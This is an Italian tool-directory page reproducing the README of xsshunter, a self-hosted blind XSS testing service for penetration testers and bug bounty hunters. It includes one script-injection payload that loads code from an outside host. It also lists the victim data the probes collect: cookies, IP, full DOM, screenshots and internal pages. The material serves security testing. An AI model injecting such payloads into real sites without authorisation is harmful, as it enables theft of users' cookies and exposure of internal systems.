Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
xsshunter — Il servizio XSS Hunter - una versione portatile di XSSHunter.com | Kitploit
Strumenti/GitHubGitHub/mandatoryprogrammer/xsshunter
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmandatoryprogrammer/xsshunter

xsshunter

Il servizio XSS Hunter - una versione portatile di XSSHunter.com

Vedi Repository
1.6k3035 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DEPRECATO - PROVA LA NUOVA VERSIONE EXPRESS

Vedi qui per maggiori informazioni: https://github.com/mandatoryprogrammer/xsshunter-express

Codice Sorgente di XSS Hunter

Questa è una versione portatile del codice sorgente in esecuzione su https://xsshunter.com. È progettata per essere facilmente installabile su qualsiasi server per professionisti della sicurezza e cacciatori di bug bounty che desiderano testare XSS in modo molto più potente.

Se non vuoi configurare questo software e preferisci semplicemente iniziare a testare, vedi https://xsshunter.com .

Requisiti

  • Un server con (preferibilmente) Ubuntu.
  • Un account Mailgun, per inviare email di attivazione del payload XSS.
  • Un nome di dominio, preferibilmente qualcosa di breve per mantenere ridotte le dimensioni del payload. Ecco un buon sito per trovare nomi di dominio di due lettere: https://catechgory.com/. Il mio dominio è xss.ht per esempio.
  • Un certificato SSL wildcard, eccone uno economico. È necessario perché XSS Hunter identifica gli utenti in base ai loro sottodomini e tutti devono essere abilitati SSL. Non possiamo usare Let's Encrypt perché non supportano certificati wildcard. Evito di insultare il modello di business delle CA, ma stai tranquillo che è molto stupido e costa loro pochissimo creare un certificato wildcard, quindi scegli il provider più economico che trovi (purché sia supportato in tutti i browser).

Configurazione

Consulta https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ per informazioni su come configurare XSS Hunter sul tuo server.

Riepilogo delle Funzionalità

Dopo la registrazione creerai un dominio breve speciale come yoursubdomain.xss.ht che identifica le tue vulnerabilità XSS e ospita il tuo payload. Utilizzerai quindi questo sottodominio nei tuoi test XSS, usando tentativi di iniezione come "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter servirà automaticamente i probe XSS e raccoglierà le informazioni risultanti quando si attivano.

Funzionalità

  • Attivazioni di payload XSS gestite: Gestisci tutti i tuoi payload XSS nel pannello di controllo del tuo account XSS Hunter.
  • Potenti Probe XSS: Le seguenti informazioni vengono raccolte ogni volta che un probe si attiva su una pagina vulnerabile:
    • L'URI della pagina vulnerabile
    • Origine dell'esecuzione
    • L'indirizzo IP della vittima
    • Il Referer della pagina
    • Lo User Agent della vittima
    • Tutti i cookie non HTTP-Only
    • Il DOM HTML completo della pagina
    • Screenshot completo della pagina interessata
    • Richiesta HTTP responsabile (se viene utilizzato uno strumento compatibile con XSS Hunter)
  • Screenshot Completi della Pagina: I probe di XSS Hunter utilizzano l'API canvas HTML5 per generare uno screenshot completo della pagina vulnerabile su cui un payload XSS si è attivato. Con questa funzionalità puoi dare un'occhiata a pannelli amministrativi interni, help desk, sistemi di logging e altre app web interne. Ciò consente di creare report più potenti che mostrano l'impatto completo della vulnerabilità al tuo cliente o al programma bug bounty.
  • Generazione di Report in Markup: Ogni report di payload XSS include un report markdown pre-generato. Questi report generati sono anche compatibili con altre piattaforme che supportano markdown, come Phabricator, per una facile segnalazione di bug sui sistemi di ticketing aziendali.
  • Report Via Email di Attivazione Payload XSS: Le attivazioni di payload XSS inviano anche report email dettagliati che possono essere facilmente inoltrati ai contatti di sicurezza appropriati per una facile segnalazione di bug critici.
  • Generazione Automatica di Payload: XSS Hunter genera automaticamente payload XSS da utilizzare nei tuoi test di sicurezza delle applicazioni web.
  • Iniezioni Correlate: Forse la funzionalità più potente di XSS Hunter è la capacità di correlare i tentativi di iniezione con le attivazioni di payload XSS. Utilizzando uno strumento di test compatibile con XSS Hunter puoi sapere immediatamente cosa ha causato l'attivazione di un payload specifico (anche settimane dopo il tentativo di iniezione!).
  • Opzione Crittografia PGP per Email di Payload: Extra paranoico? È disponibile la crittografia PGP lato client che crittograferà tutti i dati di iniezione nel browser della vittima prima di inviarli al servizio XSS Hunter.
  • Acquisizione di Pagine: All'attivazione del tuo payload XSS, puoi specificare un elenco di percorsi relativi che il payload deve recuperare e memorizzare automaticamente. Ciò è utile per trovare altre vulnerabilità, come policy crossdomain.xml errate su sistemi interni a cui normalmente non si potrebbe accedere.
  • Caricamento Payload Secondario: Hai un payload secondario che vuoi caricare dopo che XSS Hunter ha fatto il suo dovere? XSS Hunter ti offre la possibilità di specificare un payload JavaScript secondario da eseguire dopo aver completato la sua raccolta.
  • Applicazione Web iOS: È anche possibile visualizzare le attivazioni dei tuoi payload XSS tramite un'app web iOS. Basta navigare al percorso /app e salvare la pagina come applicazione web sul desktop del tuo iPhone.

Exploit Notevoli

  • Blind XSS nello strumento di assistenza interno di Tesla: https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
  • Blind XSS nell'integrazione Salesforce di Spotify: https://mhmdiaa.github.io/blind-xss-in-spotify/
  • Blind XSS nel pannello di supporto di GoDaddy: https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

Vuoi Contribuire?

Tutto il codice è stato creato da me e (per questo motivo) probabilmente non è una best practice e sicuramente necessita di ottimizzazione/pulizia. Ogni pull request è gradita!

Scarica lo strumento